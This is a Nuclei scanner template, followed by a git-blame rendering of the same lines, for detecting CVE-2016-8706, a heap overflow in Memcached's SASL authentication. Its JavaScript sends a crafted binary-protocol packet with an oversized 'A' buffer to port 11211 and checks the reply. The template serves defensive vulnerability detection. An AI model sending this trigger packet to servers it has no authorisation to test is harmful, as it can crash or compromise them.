javascript/cves/2016/CVE-2016-8706.yaml

id: CVE-2016-8706

info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.68629
    epss-percentile: 0.98344
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    verfied: true
  tags: cve,cve2016,rce,js,memcached

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"

      - type: word
        words:
          - "Auth failure"
        negative: true
# digest: 490a00463044022043f289ec8f7217e121ba5f2652cc19407c2816d1b99b2940b085e1cef212d85e022034369ce96580506d569687406e632bf6779bfb9ccfa6df0567aaea31e4ae10d5:922c64590222798bb761d5b6d8e72950
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`id: CVE-2016-8706`
Update CVE-2016-8706 2023-11-13 16:03:23 +05:30
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`info:`
fix lint 2023-11-14 11:23:08 +05:30			`name: Memcached Server SASL Authentication - Remote Code Execution`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`author: pussycat0x`
			`severity: high`
Update CVE-2016-8706 2023-11-13 16:03:23 +05:30			`description: \|`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`reference:`
			`- https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py`
			`- https://nvd.nist.gov/vuln/detail/CVE-2016-8706`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`- http://rhn.redhat.com/errata/RHSA-2016-2819.html`
			`- http://www.debian.org/security/2016/dsa-3704`
			`- http://www.securitytracker.com/id/1037333`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.1`
			`cve-id: CVE-2016-8706`
			`cwe-id: CWE-190`
updated EPSS score 2025-07-28 17:11:21 -05:00			`epss-score: 0.68629`
EPSS Update 2025-07-02 14:13:14 +05:30			`epss-percentile: 0.98344`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`cpe: cpe:2.3:a:memcached:memcached::::::::`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`metadata:`
Revert "chore: update TemplateMan 🤖" This reverts commit c31d574176f2b9e6f8d4fe573a24e7192f808e84. 2025-05-27 10:39:47 +08:00			`max-request: 1`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`vendor: memcached`
			`product: memcached`
Update CVE-2016-8706 2023-11-13 16:03:23 +05:30			`verfied: true`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`tags: cve,cve2016,rce,js,memcached`
Revert "chore: update TemplateMan 🤖" This reverts commit c31d574176f2b9e6f8d4fe573a24e7192f808e84. 2025-05-27 10:39:47 +08:00
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`javascript:`
JS pre-condition - update 2024-07-10 17:38:01 +05:30			`- pre-condition: \|`
			`isPortOpen(Host,Port);`
			`code: \|`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`let packet = bytes.NewBuffer();`
			`packet.Write(new Uint8Array([0x80, 0x21]))`
			`let cmd = 'stats'`
			`packet.WriteString(cmd)`
			`packet.Pack("!H", [32]);`
			`packet.Pack("!I", [1]);`
			`let buzz = Array(1000).fill("A").join('');`
			`packet.WriteString(buzz)`
			`const c = require("nuclei/net");`
			let conn = c.Open('tcp', `${Host}:${Port}`);
			`conn.SendHex(packet.Hex());`
			`conn.RecvString();`
			`args:`
			`Host: "{{Host}}"`
			`Port: 11211`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "Invalid arguments"`

			`- type: word`
			`words:`
			`- "Auth failure"`
			`negative: true`
chore: sign templates 🤖 2025-07-28 22:24:00 +00:00			`# digest: 490a00463044022043f289ec8f7217e121ba5f2652cc19407c2816d1b99b2940b085e1cef212d85e022034369ce96580506d569687406e632bf6779bfb9ccfa6df0567aaea31e4ae10d5:922c64590222798bb761d5b6d8e72950`